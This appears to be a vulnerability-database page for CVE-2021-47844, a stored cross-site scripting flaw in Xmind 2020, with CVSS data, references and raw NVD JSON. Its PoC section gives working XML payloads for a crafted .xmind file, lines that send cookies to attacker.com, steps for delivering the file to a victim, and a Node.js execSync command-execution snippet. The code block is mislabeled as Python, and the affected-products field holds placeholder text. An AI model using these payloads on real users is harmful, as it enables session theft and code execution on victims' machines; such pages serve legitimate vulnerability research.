CVE-2021-47844

Description

Xmind 2020 contains a cross-site scripting vulnerability that allows attackers to inject malicious payloads into mind mapping files or custom headers. Attackers can craft malicious files with embedded JavaScript that execute system commands when opened, enabling remote code execution through mouse interactions or file opening.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Xmind 2020 < 版本号(官方修复版本)

Xmind 2020 所有版本均受影响(在官方修复前)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2021-47844 XSS PoC for Xmind 2020 -->
<!-- This PoC demonstrates persistent XSS in Xmind .xmind file -->

<!-- Method 1: Inject via XML content.xml in .xmind file -->
<!-- 1. Create a new .xmind file or unzip existing one -->
<!-- 2. Modify the content.xml file with the following payload -->

<topic id="topic1">
  <title><![CDATA[<script>alert('XSS - CVE-2021-47844')</script>]]></title>
  <notes>
    <plain-text><![CDATA[<img src=x onerror="alert(document.cookie)">]]></plain-text>
  </notes>
</topic>

<!-- Method 2: Using event handlers -->
<topic id="topic2">
  <title><![CDATA[<img src=x onerror='fetch("https://attacker.com/steal?c="+document.cookie)' >]]></title>
</topic>

<!-- Method 3: Custom header injection -->
<topic id="topic3">
  <custom-properties>
    <custom-property key="author">
      <script>document.location='https://attacker.com/log?data='+btoa(document.cookie)</script>
    </custom-property>
  </custom-properties>
</topic>

<!-- Steps to exploit: -->
<!-- 1. Create malicious .xmind file with payload above -->
<!-- 2. Share file with victim via email or file sharing -->
<!-- 3. When victim opens file in Xmind 2020, XSS executes -->
<!-- 4. Attacker can steal cookies, perform actions as victim -->

<!-- For RCE demonstration (if combined with other vulnerabilities): -->
<script>
  // Attempt to execute commands via Node.js integration if available
  if (typeof require !== 'undefined') {
    const { execSync } = require('child_process');
    execSync('calc.exe'); // Example: spawn calculator on Windows
  }
</script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47844
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47844
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47844/
[4] VulDB https://vuldb.com/cve/CVE-2021-47844
[5] https://imgur.com/a/t96Nxo5
[6] https://www.exploit-db.com/exploits/49827
[7] https://www.vulncheck.com/advisories/xmind-persistent-cross-site-scripting
[8] https://www.xmind.net/
[9] https://www.vulncheck.com/advisories/xmind-persistent-cross-site-scripting

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47844", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:10.183", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Xmind 2020 contains a cross-site scripting vulnerability that allows attackers to inject malicious payloads into mind mapping files or custom headers. Attackers can craft malicious files with embedded JavaScript that execute system commands when opened, enabling remote code execution through mouse interactions or file opening."}, {"lang": "es", "value": "Xmind 2020 contiene una vulnerabilidad de cross-site scripting que permite a los atacantes inyectar cargas útiles maliciosas en archivos de mapas mentales o encabezados personalizados. Los atacantes pueden crear archivos maliciosos con JavaScript incrustado que ejecutan comandos del sistema al abrirlos, lo que permite la ejecución remota de código a través de interacciones del ratón o la apertura de archivos."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://imgur.com/a/t96Nxo5", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49827", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/xmind-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.xmind.net/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/xmind-persistent-cross-site-scripting", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}